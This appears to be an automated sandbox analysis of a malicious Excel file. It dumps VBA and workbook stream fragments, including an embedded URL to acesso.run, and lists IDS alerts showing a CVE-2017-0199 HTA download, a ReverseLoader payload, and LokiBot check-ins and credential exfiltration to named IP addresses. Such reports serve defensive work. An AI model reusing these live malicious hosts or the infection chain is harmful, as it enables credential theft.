                                                                                                  Data ASCII:. . . . C ` c T . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . a . c . e . s . s . o . . . r . u . n . / . l . l . 2 . r . d . E . ? . & . m . o . u . s . t . a . c . h . e . = . h . i . s . t . o . r . i . c . a . l . & . s . p . a . d . e . = . l . o . n . e . l . y . & . f . a . t . h . e . r . . . z ` = k _ b . . K 3 . L - u , . 1 ' . . . 0 l . M . V V . . s . O r [ > i . O P B f m . . $ @ . . 6 U O 3 . T . E . . . . . . . . . . . . . . . . . . . r . t . G . 3 . w . g .
                                                                                                  Data Raw:01 00 00 02 bb 43 9c 60 d7 f4 63 54 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b f4 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 61 00 63 00 65 00 73 00 73 00 6f 00 2e 00 72 00 75 00 6e 00 2f 00 6c 00 6c 00 32 00 72 00 64 00 45 00 3f 00 26 00 6d 00 6f 00 75 00 73 00 74 00 61 00 63 00 68 00 65 00 3d 00 68 00 69 00 73 00
                                                                                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 448081
                                                                                                  General
                                                                                                  Stream Path:Workbook
                                                                                                  CLSID:
                                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                                  Stream Size:448081
                                                                                                  Entropy:7.999144173902044
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . T E _ _ . M 6 . P + . . e . # s . . V * a : % j h . Q & . . . . . . . . q A . . . \\ . p . { K w > Q . . . g = * . ^ ? . / - o T O b . y . ) - | V = j < 6 z . < . . # * . / < [ . X S y . # I . 5 ; . F B . . . ' a . . . . . . . = . . . b . . . . . y . . . . . . ~ . . . . . " . . . . v . . . . . . . . . . . V = . . . n } N S . $ z 6 : 1 . e n . @ . . . . . . . Q " . . . , . . . . . . . . 1 . . . . 1 . . . 3 c % . { \\ . @ h ) g . | 1 . . . c . j ; . f 8
                                                                                                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 0e d2 07 be 9d 8c 54 45 93 5f cd 5f 19 4d eb 36 1e 50 d2 2b 10 02 ff c4 65 c2 1d e3 23 93 ee d1 73 16 02 bb 56 2a 61 3a 25 6a ae 68 2e 51 26 1f e1 00 02 00 b0 04 c1 00 02 00 71 41 e2 00 00 00 5c 00 70 00 7b 4b 77 3e b9 b7 e5 c8 c1 ee d8 f0 51 ba ce 8c d7 9a dd dc a3 a3 b5 67 e3 3d 2a 7f 90 fa
                                                                                                  Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 525
                                                                                                  General
                                                                                                  Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                                  CLSID:
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Stream Size:525
                                                                                                  Entropy:5.267192524108324
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:I D = " { 3 7 2 E B C 5 F - C 6 A 9 - 4 1 D 4 - A 8 3 7 - 7 0 3 A E 4 C 8 2 5 6 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 6 3 4 D 6 D 1 5 E 5 3 2 7 5 7 2
                                                                                                  Data Raw:49 44 3d 22 7b 33 37 32 45 42 43 35 46 2d 43 36 41 39 2d 34 31 44 34 2d 41 38 33 37 2d 37 30 33 41 45 34 43 38 32 35 36 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                  Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                                                                  General
                                                                                                  Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                                  CLSID:
                                                                                                  File Type:data
                                                                                                  Stream Size:104
                                                                                                  Entropy:3.0488640812019017
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                  Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                  Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                                                  General
                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                  CLSID:
                                                                                                  File Type:data
                                                                                                  Stream Size:2644
                                                                                                  Entropy:3.980440177501463
                                                                                                  Base64 Encoded:False
                                                                                                  Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                  Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                  Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                                                                  General
                                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                  CLSID:
                                                                                                  File Type:data
                                                                                                  Stream Size:553
                                                                                                  Entropy:6.368471239003781
                                                                                                  Base64 Encoded:True
                                                                                                  Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . 4 i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                                                  Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 f2 03 34 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                  Network Behavior

                                                                                                  Suricata IDS Alerts

                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2024-10-30T08:04:21.083990+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1198.46.178.15180192.168.2.2249188TCP
                                                                                                  2024-10-30T08:04:21.083990+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1198.46.178.15180192.168.2.2249177TCP
                                                                                                  2024-10-30T08:04:21.083990+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249256TCP
                                                                                                  2024-10-30T08:04:22.916020+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164198.46.178.15180TCP
                                                                                                  2024-10-30T08:04:22.916115+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1198.46.178.15180192.168.2.2249164TCP
                                                                                                  2024-10-30T08:04:25.146736+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166198.46.178.15180TCP
                                                                                                  2024-10-30T08:04:25.146761+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1198.46.178.15180192.168.2.2249166TCP
                                                                                                  2024-10-30T08:04:32.340412+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249167198.46.178.15180TCP
                                                                                                  2024-10-30T08:04:44.090523+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249174198.46.178.15180TCP
                                                                                                  2024-10-30T08:04:49.058822+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21172.217.16.193443192.168.2.2249169TCP
                                                                                                  2024-10-30T08:05:05.900275+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21172.217.16.193443192.168.2.2249176TCP
                                                                                                  2024-10-30T08:05:06.459100+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:06.459100+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:06.459100+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:07.435617+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224917894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:07.647492+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:07.647492+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:07.647492+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:08.595336+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224917994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:08.819302+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:08.819302+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:08.819302+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:09.805259+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:09.805259+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:09.811066+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249180TCP
                                                                                                  2024-10-30T08:05:10.915321+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:10.915321+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:10.915321+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:11.866370+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:11.866370+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:11.872003+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249181TCP
                                                                                                  2024-10-30T08:05:12.060057+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:12.060057+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:12.060057+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:13.066042+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:13.066042+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:13.072197+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249182TCP
                                                                                                  2024-10-30T08:05:13.566514+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:13.566514+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:13.566514+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:14.530693+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:14.530693+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:14.536591+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249183TCP
                                                                                                  2024-10-30T08:05:14.723916+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:14.723916+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:14.723916+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:15.724084+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:15.724084+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:15.729935+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249184TCP
                                                                                                  2024-10-30T08:05:15.942458+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:15.942458+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:15.942458+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:16.903233+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:16.903233+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:16.908883+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249185TCP
                                                                                                  2024-10-30T08:05:17.133399+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:17.133399+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:17.133399+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:18.116518+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:18.116518+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:18.122389+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249186TCP
                                                                                                  2024-10-30T08:05:19.277982+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:19.277982+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:19.277982+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:20.257432+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:20.257432+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:20.264025+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249187TCP
                                                                                                  2024-10-30T08:05:20.440589+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:20.440589+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:20.440589+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:21.414268+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:21.414268+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:21.419954+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249189TCP
                                                                                                  2024-10-30T08:05:21.588925+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:21.588925+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:21.588925+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:22.547976+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:22.547976+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:22.553795+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249190TCP
                                                                                                  2024-10-30T08:05:22.901001+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:22.901001+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:22.901001+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:23.878561+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:23.878561+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:23.884597+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249191TCP
                                                                                                  2024-10-30T08:05:24.031737+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:24.031737+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:24.031737+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:25.013347+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:25.013347+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919294.156.177.22080TCP
                                                                                                  2024-10-30T08:05:25.020459+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249192TCP
                                                                                                  2024-10-30T08:05:25.168138+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:25.168138+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:25.168138+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:26.165009+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:26.165009+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919394.156.177.22080TCP
                                                                                                  2024-10-30T08:05:26.170894+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249193TCP
                                                                                                  2024-10-30T08:05:26.316456+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:26.316456+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:26.316456+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:27.298933+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:27.298933+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919494.156.177.22080TCP
                                                                                                  2024-10-30T08:05:27.304776+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249194TCP
                                                                                                  2024-10-30T08:05:27.446562+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:27.446562+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:27.446562+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:28.420361+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:28.420361+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919594.156.177.22080TCP
                                                                                                  2024-10-30T08:05:28.426228+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249195TCP
                                                                                                  2024-10-30T08:05:28.769767+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:28.769767+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:28.769767+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:29.712490+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:29.712490+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919694.156.177.22080TCP
                                                                                                  2024-10-30T08:05:29.718208+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249196TCP
                                                                                                  2024-10-30T08:05:30.189639+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:30.189639+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:30.189639+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:31.143830+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:31.143830+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919794.156.177.22080TCP
                                                                                                  2024-10-30T08:05:31.149647+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249197TCP
                                                                                                  2024-10-30T08:05:31.291768+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:31.291768+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:31.291768+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:32.248948+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:32.248948+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919894.156.177.22080TCP
                                                                                                  2024-10-30T08:05:32.254663+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249198TCP
                                                                                                  2024-10-30T08:05:33.448528+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:33.448528+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:33.448528+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:34.425498+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:34.425498+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919994.156.177.22080TCP
                                                                                                  2024-10-30T08:05:34.431279+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249199TCP
                                                                                                  2024-10-30T08:05:34.573615+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:34.573615+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:34.573615+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:35.531260+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:35.531260+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920094.156.177.22080TCP
                                                                                                  2024-10-30T08:05:35.537144+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249200TCP
                                                                                                  2024-10-30T08:05:36.354024+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:36.354024+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:36.354024+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:37.315009+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:37.315009+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920194.156.177.22080TCP
                                                                                                  2024-10-30T08:05:37.321040+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249201TCP
                                                                                                  2024-10-30T08:05:37.472418+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920294.156.177.22080TCP
